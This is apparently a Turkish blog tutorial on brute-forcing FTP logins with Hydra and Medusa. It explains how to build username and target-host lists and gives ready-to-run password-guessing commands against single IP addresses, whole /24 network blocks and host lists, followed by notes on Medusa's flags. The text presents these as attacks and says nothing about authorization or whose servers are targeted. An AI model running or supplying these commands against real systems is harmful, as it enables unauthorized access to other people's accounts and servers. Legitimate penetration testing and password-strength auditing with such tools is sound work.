Merhaba Arkadaşlar,
Bu makalemizde sizlere Hydra ve Medusa ile FTP saldırısı yapmayı anlatacağım.
Kendi hazırlamış olduğunuz yada dışardan bulmuş olduğunuz wordlist ile şifre denemeleri yapacağız.
Kendinize wordlist hazırlamak isterseniz https://www.bzdmr.com/kendi-wordlist-imi-nasil-yapabilirim-/sayfa/25 makalemizden yararlana bilirsiniz.
1.) Hangi kullanıcılar üzerinde atak yapılması istiyorsanız bunun için root/ dizini (farklı dizin) altında user.txt (farklı ad kullana bilirsiniz) dosyası oluştrumanız gerekmektedir.
touch /root/user.txt
2.) Dosyayı açıp içerisine atak yapılmasını istediğiniz kullanıcı adlarını yazınız.
nano /root/user.txt
Yada açmadanda echo komutu ile satır satır ekleye bilirsiniz.
echo admin >> /root/user.txt
3.) Hangi ip adresine yada host adına atak yapılmasını istiyorsanız root/ dizini (farklı dizin) altında server.txt (farklı ad kullana bilirsiniz) dosyası oluştrumanız gerekmektedir.
nano /root/server.txt
Yada açmadanda echo komutu ile satır satır ekleye bilirsiniz.
echo hostname >> /root/server.txt
4.) Hazırlamış olduğumuz wordlist'imiz, user ve server dosyları ile artık saldırıya geçe biliriz. Aşağıdaki komut ile saldırıyı başlata bilirsiniz.
hydra -P root/wordlist.txt -L /root/user.txt -M /root/server.txt ftp -t 1
1.) Aşağıdaki komutla ile tek ip üzerine tek şifre ve tek kullanıcı adına saldırı yapmış olacaksınız.
hydra -p 1q2w3e4r -l user ftp://192.168.1.2
2.) Aşağıdaki komutla ile ip block üzerine tek şifre ve tek kullanıcı adına saldırı yapmış olacaksınız.
hydra -p 1q2w3e4r -l user ftp://192.168.1.1/24
3.) Aşağıdaki komut ile ip adresi ve host adını oluşturduğunuz server.txt dosyası haricinde diğerlerini manual olarak yazarak saldırı yapmış olacaksınız.
hydra -p 1q2w3e4r -l user -M root/server.txt ftp
4.) Aşağıdaki komut ile oluşturduğunuz wordlist.txt dosyası haricinde diğerlerini manual olarak yazarak saldırı yapmış olacaksınız.
hydra -P root/wordlist.txt -l user ftp://192.168.1.1
5.) Aşağıdaki komutla birlikte ip block ve oluşturduğunuz wordlist.txt dosyası haricinde diğerlerini manual olarak yazarak saldırı yapmış olacaksınız.
hydra -P root/wordlist.txt -l user ftp://domain.com -t 1
Yukarıda yapılan işlemler medusa’da, da aynı şekilde geçerlidir sadece birkaç komut değişikliği vardır. Sizlere medusa üzerinden FTP saldırısı için bir kaç örnek kodlar vereceğim.
medusa -h 192.168.1.1 -u root -P root/wordlist.txt -n 21 -M ftp
medusa -H root/server.txt -u root -P root/wordlist.txt -n 21 -M ftp
Ayrıca sizlere medusa üzerinde kullanabileceğiniz komutlardan bahsetmek istiyorum komutlar ve kullanım şekilleri aşağıdaki gibidir;
-h komutu
hostname / ip olarak geçiyor bu komut yerine -H
komutunu kullanırsanız dosya ile tarama yaparsınız. Örnek olarak -H /root/server.txt
-M
komutu modül seçimi yapmanızaı sağlar örneğin FTP olarak varsayımda -M ftp
komutu ile ftp modülü üzerinden saldırı yapmış olursunuz.
Diğer tüm modülleri görüntüleye bilmek için medusa -d
komutunu kullanmanız yeterli olacaktır.
-n
komutu port numarası belirlemine olanak sağlar örnek olarak -n 21
komutu ile 21. porta saldırı yapılacağını belirtmiş oluyorsunuz.
-P
komutu oluşturduğunuz wordlist'i seçmenize olanak sağlar. Bunun yerine manual olarak -p 1q2w3e4r
komutu ile manual olarak belirlediğiniz şifre ile saldırı denemesi yapmış olursunuz.
Bir başka makalede görüşmek dileği ile...